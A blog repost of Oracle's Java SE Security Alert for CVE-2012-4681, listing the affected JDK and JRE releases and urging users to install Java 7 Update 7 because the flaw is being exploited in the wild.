In addition, this Security Alert includes a security-in-depth fix in the AWT subcomponent of the Java Runtime Environment.
Due to the severity of these vulnerabilities, the public disclosure of technical details and the reported exploitation of CVE-2012-4681 "in the wild," Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.

Supported Products Affected

Security vulnerabilities addressed by this Security Alert affect the products listed in the categories below.  Please click on the link in the Patch Availability column or in the Patch Availability Table to access the documentation for those patches.
Affected product releases and versions:
Java SEPatch Availability
JDK and JRE 7 Update 6 and beforeJava SE
JDK and JRE 6 Update 34 and beforeJava SE

Patch Availability Table and Risk Matrix

Java SE fixes in this Security Alert are cumulative; this latest update includes all fixes from previous Critical Patch Updates and Security Alerts.

Patch Availability Table

Product GroupRisk MatrixPatch Availability and Installation Information
Oracle Java SEOracle JDK and JRE Risk Matrix

Also Java 7 Update 7 is now available to download for Windows (32- and 64-bit), Linux (32- and 64-bit), Mac OS X (64-bit), Solaris x86 (32- and 64-bit) and Solaris SPARC (32- and 64-bit). JDKs with the updated Java runtimes are also available. Users with Java installed on their systems, whatever operating system, should install the updates as soon as possible because malicious software that uses the vulnerability is already in circulation. For detailed information click here






SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search